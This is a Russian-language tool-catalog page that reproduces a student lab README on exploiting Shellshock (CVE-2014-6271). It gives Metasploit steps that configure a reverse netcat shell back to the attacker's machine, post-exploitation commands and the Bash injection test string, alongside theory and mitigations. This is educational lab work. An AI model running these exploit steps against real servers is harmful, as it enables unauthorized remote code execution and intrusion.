Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — Образовательная лаборатория, демонстрирующая эксплуатацию Shellshock (CVE-2014-6271) с использованием Metasploit против Metasploitable 2, включая сканирование, эксплуатацию, обратный шелл и стратегии смягчения. | Kitploit
Инструменты/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

Образовательная лаборатория, демонстрирующая эксплуатацию Shellshock (CVE-2014-6271) с использованием Metasploit против Metasploitable 2, включая сканирование, эксплуатацию, обратный шелл и стратегии смягчения.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🐚 Shellshock (CVE-2014-6271) – Эксплуатация и анализ

📌 Обзор

Это практическое задание по курсу Оценка уязвимостей и тестирование на проникновение – II, посвящённое эксплуатации и анализу уязвимости Shellshock (CVE-2014-6271).
Выполнено в контролируемой лабораторной среде с использованием Metasploitable 2 (цель) и Kali Linux (атакующий).


🛠 Используемые инструменты

  • 💻 Kali Linux – Машина атакующего
  • 🖥 Metasploitable 2 – Уязвимая цель
  • 🔍 Nmap – Сканирование и обнаружение служб
  • 🎯 Metasploit Framework – Эксплуатация

🔍 Краткое описание уязвимости

  • Тип: Удалённое выполнение кода (RCE)
  • Затронутый компонент: GNU Bash (версии 1.14–4.3)
  • Воздействие: Выполнение произвольных команд с помощью специально сформированных переменных окружения
  • Оценка CVSS: 10.0 (Критическая)
  • Вектор эксплуатации: Часто через HTTP-заголовки к CGI-скриптам

⚡ Лабораторные шаги

1️⃣ Сканирование цели

root@kitploit:~
 nmap -sS -sV <target-ip>

2️⃣ Запуск Metasploit msfconsole

3️⃣ Загрузка модуля эксплойта use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ Настройка эксплойта

root@kitploit:~
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ Запуск эксплойта exploit

📸 Демонстрация включает

root@kitploit:~
📡 Результаты сканирования Nmap
⚙️ Конфигурация Metasploit
🔄 Вывод сессии обратной оболочки
🛠 Команды после эксплуатации:
whoami
uname -a
ifconfig

📖 Теоретические основы Что такое Shellshock?

Shellshock — это уязвимость в оболочке GNU Bash, которая позволяет злоумышленникам выполнять произвольные команды, внедряя их в переменные окружения. Обнаружена в сентябре 2014 года и получила идентификатор CVE-2014-6271. Поражает Bash версий с 1.14 по 4.3. Как это работает

Bash некорректно обрабатывает определения функций в переменных окружения и выполняет дополнительные команды после тела функции. На веб-серверах, использующих CGI-скрипты, HTTP-заголовки становятся переменными окружения, что создаёт лёгкий путь для атаки.

Пример:

env x='() { :;}; echo vulnerable' bash -c "echo test"

Если уязвим, выведет vulnerable. Воздействие

root@kitploit:~
Полное удалённое выполнение кода (RCE) без аутентификации
Эксплуатируется с помощью простых HTTP-запросов
Использовался в ботнетах, червях, целевых атаках
Поразил миллионы серверов, маршрутизаторов и IoT-устройств

Реальные примеры эксплуатации

root@kitploit:~
Серверы Yahoo – Вредоносное ПО через CGI-скрипты
Ботнет Wopbot – Автоматизированная эксплуатация
QNAP NAS – Удалённый доступ к оболочке и вредоносное ПО
Самореплицирующиеся черви – Распространение на новые уязвимые хосты

🛡 Предотвращение и смягчение

root@kitploit:~
🔄 Немедленно обновить Bash
🚫 Отключить неиспользуемые CGI-скрипты
🔥 Использовать брандмауэры для блокировки ненужного трафика
🛡 Развернуть межсетевые экраны для веб-приложений (WAF)
📜 Мониторить журналы HTTP-запросов
👤 Применять принцип минимальных привилегий

⚠️ Отказ от ответственности

Этот проект предназначен исключительно для образовательных целей. Всё тестирование проводилось в контролируемой лабораторной среде. ❌ Не используйте эти методы на системах без разрешения.

👨‍💻 Автор: Janith Madhusankha 🎓 Курс: BICT (Hons) в области сетей и безопасности 🏫 Учебное заведение: Юго-Восточный университет Шри-Ланки

Скачать инструмент